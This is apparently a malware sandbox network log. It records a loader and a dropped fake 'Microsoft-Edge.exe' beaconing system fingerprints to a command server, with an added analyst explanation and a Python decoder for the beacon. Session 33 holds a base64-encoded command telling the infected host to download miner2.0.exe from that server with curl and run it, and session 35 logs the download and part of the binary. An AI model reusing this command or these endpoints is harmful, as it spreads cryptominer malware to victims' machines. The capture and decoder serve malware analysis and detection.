POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

2024-09-27 15:42:26 UTC | 630 | IN
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:26 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fOCss7l%2FSb4Zk8oDftSwRIBLB%2BxrrZqMgFD7r3Fty0n7S3B5s5xU%2BmrLxDkEsCs3jygR7q%2FaqKmUSRr6pAJL41Laf%2B1CbEmGnABtPg1rj%2BHirEnQDMkGdn1tHo%2FSWDV5M819WqOdyRLb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a85a8a3437a-EWR

2024-09-27 15:42:26 UTC | 7 | IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

2024-09-27 15:42:26 UTC | 5 | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 27 | Source: 192.168.2.4:49786 | Destination: 172.67.187.100:443 | PID: 1748 | Process: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data

2024-09-27 15:42:27 UTC | 621 | OUT
POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

2024-09-27 15:42:27 UTC | 630 | IN
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:27 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NEcFgjg%2FHgbOWO%2F%2FjQ0GWYBiki9ja8VMk%2FQ%2FWDVzXE81A7iDPHD%2BtoBNADhiVQsPc5qDIm2YFDsAr05ZeC%2B3cB5oA6yTPZEanm60dWO9cllXOhtqwNHRCsYEWVH1MA8fwehXru6qLt5z"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a8e69024240-EWR

2024-09-27 15:42:27 UTC | 7 | IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

2024-09-27 15:42:27 UTC | 5 | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 28 | Source: 192.168.2.4:49785 | Destination: 172.67.187.100:443 | PID: 7636 | Process: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Timestamp | Bytes transferred | Direction | Data

2024-09-27 15:42:27 UTC | 621 | OUT
POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

2024-09-27 15:42:27 UTC | 628 | IN
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:27 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XNa4ft4WAex%2Fbv48fSXlqJl8DzVQDr1HmNziFyamaOJZ2ZKOu61OldP2m1KcIysxwrtTFSBEf60%2BRDaVWJ9R3D033YZLz7PyiIFT0GndIe%2Fce3SwPfGz7Fd8h%2BKs6E4W27Vf%2BrI%2FQi9A"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a8e8e0dc338-EWR

2024-09-27 15:42:27 UTC | 7 | IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

2024-09-27 15:42:27 UTC | 5 | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 29 | Source: 192.168.2.4:49788 | Destination: 172.67.187.100:443 | PID: 1748 | Process: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data

2024-09-27 15:42:28 UTC | 621 | OUT
POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

2024-09-27 15:42:29 UTC | 624 | IN
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ep2bkGE%2FA3J%2FvLjUzdS%2Bi3TLVyGO0tuyGcDM7Rjint4hcXkqWIEzDWuhntXPp%2FR8r8807GYhaRHxTp2LdZ7qknd5P0T2Z3KSZdn1xEJyJD9PdKJr7e1YmSBhCgp592jEECUgFW6TDKKE"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a9689c4de96-EWR

2024-09-27 15:42:29 UTC | 7 | IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

2024-09-27 15:42:29 UTC | 5 | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 30 | Source: 192.168.2.4:49789 | Destination: 172.67.187.100:443 | PID: 7636 | Process: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Timestamp | Bytes transferred | Direction | Data

2024-09-27 15:42:28 UTC | 621 | OUT
POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online

2024-09-27 15:42:29 UTC | 626 | IN
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FnP2t0Pmix%2B9D%2BCJEWZLLKseaC1SHpsDiuTSLjmEziABka8X1ykI5TJ93UGTxH9MSegcgtv5ULKzfxDmwybIa7kdcv8X1X%2Fo0W3UJddunZh1z1yBiFBCq23FXrRa1IVxazfY%2B7aFS0QK"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a968f4072ab-EWR

2024-09-27 15:42:29 UTC | 7 | IN
Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2

2024-09-27 15:42:29 UTC | 5 | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
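
Every session from 25 to 30 above sends the same request: the host fingerprint is a JSON document, base64-encoded but not URL-encoded, carried in the token query parameter, and the server answers 200 with a chunked body whose two chunks ("2" then "0") reassemble to just two newline bytes. The JSON reports "filename": "Microsoft-Edge.exe" even in the sessions sent by loader_5879465914.exe, and its "token" value is the same number that appears in that loader's file name. The Python below is an added example written for this report; it is not Joe Sandbox code and not code from the sample. REQUEST_LINE and RESPONSE_BODY_RAW are copied from session 25; the function names, the triage() summary and its field names are the editor's own.

```python
"""Decode the check-in beacon and the chunked reply captured in session 25.

Added example for this report; not Joe Sandbox code and not code from the
sample. REQUEST_LINE and RESPONSE_BODY_RAW are copied from the capture;
decode_beacon(), decode_chunked() and triage() are the editor's own.
"""
import base64
import json
import re
from urllib.parse import urlsplit

# Request line of session 25 (request headers omitted), copied verbatim.
REQUEST_LINE = "POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1"

# The two "Data Raw" chunks of the session-25 reply, concatenated.
RESPONSE_BODY_RAW = bytes.fromhex("320d0a0a0a0d0a300d0a0d0a")


def decode_beacon(request_line: str) -> dict:
    """Return the JSON object the sample carries in the ?token= parameter.

    The base64 is sent raw (no percent-encoding), so the query string is
    split by hand: urllib's parse_qs would turn any '+' in the base64 into
    a space and corrupt the value.
    """
    method, target, _version = request_line.split(" ", 2)
    if method != "POST":
        raise ValueError(f"unexpected method {method!r}")
    query = urlsplit(target).query
    params = dict(pair.partition("=")[::2] for pair in query.split("&"))
    token = params["token"]
    token += "=" * (-len(token) % 4)  # tolerate stripped padding
    return json.loads(base64.b64decode(token, validate=True))


def decode_chunked(raw: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: <hex size>CRLF<data>CRLF ... 0CRLFCRLF."""
    body = bytearray()
    pos = 0
    while True:
        end = raw.index(b"\r\n", pos)
        size = int(raw[pos:end].split(b";", 1)[0], 16)  # drop chunk extensions
        pos = end + 2
        if size == 0:
            return bytes(body)  # last-chunk; trailers, if any, are ignored
        body += raw[pos:pos + size]
        pos += size
        if raw[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos += 2


def triage(request_line: str, process_path: str) -> dict:
    """Summarise what the beacon discloses and cross-check it against the sender.

    The loader's file name in this capture ends in the same number that the
    JSON "token" field carries; the check below makes that relationship explicit.
    """
    info = decode_beacon(request_line)
    m = re.search(r"loader_(\d+)\.exe$", process_path, re.IGNORECASE)
    return {
        "token": info.get("token"),
        "token_matches_loader_name": bool(m) and m.group(1) == info.get("token"),
        "claims_admin": info.get("admin") == "true",
        "reported_filename": info.get("filename"),
        "field_count": len(info),
    }


if __name__ == "__main__":
    print(json.dumps(decode_beacon(REQUEST_LINE), indent=2))
    print("reply body:", decode_chunked(RESPONSE_BODY_RAW))
    loader = r"C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe"
    print(triage(REQUEST_LINE, loader))
```

Two things worth noting when hunting for this traffic elsewhere: the User-Agent "A WinHTTP Example Program/1.0" is the literal string used in Microsoft's WinHTTP documentation samples, so it is a strong pivot on its own, and the reply body in every captured session is only whitespace, so nothing in this part of the capture shows the server handing back tasking; the check-ins are a fingerprint upload, repeated from both the loader and the dropped Microsoft-Edge.exe.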


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49793 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:30 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:30 UTC | 624 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:30 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B4e%2FxXDJ03FszpFN5HhdtRqQNbC4AKYhBn9qmMcbWvOFnYHM700Lg81aT2tChbFYgbGB%2FySpyGkd3qKZUV99lbVxh%2Bspv9AWwGfKo5K1AB24QuZw8CaDMXIWaRIzThMRLDx%2Fv3PBbqR5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a9f6fa4c334-EWR
2024-09-27 15:42:30 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2
2024-09-27 15:42:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49792 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:30 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:30 UTC | 626 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:30 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WRzeZMkKAJQ1q9WiBIll%2FXLoUy%2FKJE7l7SrwMzoXIyiKnzmFLX3Ua%2FZC6YQZo%2BE8hbD91GJcZDxf0kHv6hWNud2IfW0aXtEPHK0B07Ow%2BecbJMjIU7NamxtgxFOcEJnAimCxT9FW6AlJ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9a9fd99b0cba-EWR
2024-09-27 15:42:30 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2
2024-09-27 15:42:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49796 | 172.67.187.100 | 443 | 1748 | C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:31 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:32 UTC | 622 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EKusZanvXgMJS6GCXfOlwfpDLJdI63rh7GDg1eGoHz2uokfys3cAJIhoA%2Fy8qnaZZQYtmjWK9Z1LXAq6lGlGg%2FlkDoBS9E6cZYy4eXwlsum%2BcqolK9fT3n2ZwVKTkIrC1DlDU2Vho0a6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9aa84cf8438d-EWR
2024-09-27 15:42:32 UTC | 192 | IN | Data Raw: 62 61 0d 0a 0a 59 32 51 67 4c 32 51 67 4a 58 52 6c 62 58 41 6c 49 43 59 6d 49 47 52 6c 62 43 42 74 61 57 35 6c 63 6a 49 75 4d 43 35 6c 65 47 55 67 4d 6a 35 75 64 57 77 67 4a 69 59 67 59 33 56 79 62 43 41 74 62 79 42 74 61 57 35 6c 63 6a 49 75 4d 43 35 6c 65 47 55 67 61 48 52 30 63 48 4d 36 4c 79 39 6c 61 57 70 6d 63 6d 68 6c 5a 33 4a 30 59 6e 4a 6d 59 32 51 75 62 32 35 73 61 57 35 6c 4c 32 52 76 64 32 35 73 62 32 46 6b 4c 32 31 70 62 6d 56 79 4d 69 34 77 4c 6d 56 34 5a 53 41 6d 4a 69 42 7a 64 47 46 79 64 43 42 74 61 57 35 6c 63 6a 49 75 4d 43 35 6c 65 47 55 3d 0a 0d 0a
Data Ascii: baY2QgL2QgJXRlbXAlICYmIGRlbCBtaW5lcjIuMC5leGUgMj5udWwgJiYgY3VybCAtbyBtaW5lcjIuMC5leGUgaHR0cHM6Ly9laWpmcmhlZ3J0YnJmY2Qub25saW5lL2Rvd25sb2FkL21pbmVyMi4wLmV4ZSAmJiBzdGFydCBtaW5lcjIuMC5leGU=
2024-09-27 15:42:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49795 | 172.67.187.100 | 443 | 7636 | C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:31 UTC | 621 | OUT | POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
Connection: Keep-Alive
User-Agent: A WinHTTP Example Program/1.0
Content-Length: 0
Host: eijfrhegrtbrfcd.online
2024-09-27 15:42:32 UTC | 620 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.30
strict-transport-security: max-age=31536000;
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MMcL4JtxlJFJaK4EaAjNhLyYK%2FibuAJGA6Ul9754YLXWmq5cz1o8CtBo9fGjAvX2YRiraJ1lz2PeN4FDC6TZMK8Qw6lqb4UIC5mF3AaHs%2BiPtCpcXtsRa4HKhlv4zL6WLQCUP8MH3o8p"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9aa9aefcc32a-EWR
2024-09-27 15:42:32 UTC | 7 | IN | Data Raw: 32 0d 0a 0a 0a 0d 0a
Data Ascii: 2
2024-09-27 15:42:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49800 | 172.67.187.100 | 443 | 6580 | C:\Windows\System32\curl.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 15:42:32 UTC | 107 | OUT | GET /download/miner2.0.exe HTTP/1.1
Host: eijfrhegrtbrfcd.online
User-Agent: curl/7.83.1
Accept: */*
2024-09-27 15:42:33 UTC | 720 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:42:33 GMT
Content-Type: application/octet-stream
Content-Length: 45056
Connection: close
last-modified: Fri, 20 Sep 2024 09:20:01 GMT
etag: "b000-622898b2b5240"
strict-transport-security: max-age=31536000;
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=exS4%2BOP27w%2BM%2BWCthe3WimWffxwYNM7jCwiv%2F6cLf9acYMdTNos13OPv5CfGEzIrODAkdIgnlfOc3ZW2mAf49S6nDHxmQj1QUG%2FmXu48p7ymZ4Q2OB%2BZOzSUtplJSxfPSFla2aKcEept"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c9c9aaf99264405-EWR
2024-09-27 15:42:33 UTC | 649 | IN | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 c5 2d ed 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 a8 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd-f" @ @@@
                                                                                                                                                                Data Ascii: -h<Bk0'3Udil>h+)V#^Jhv1<V2\|E#UB "I{oPB-%kp$6.*qAKxJbF#Is3-HxxnQr^)y%m!BcH5.aC9Ws{i_)i53`!qSnpMaWz;Xmf3
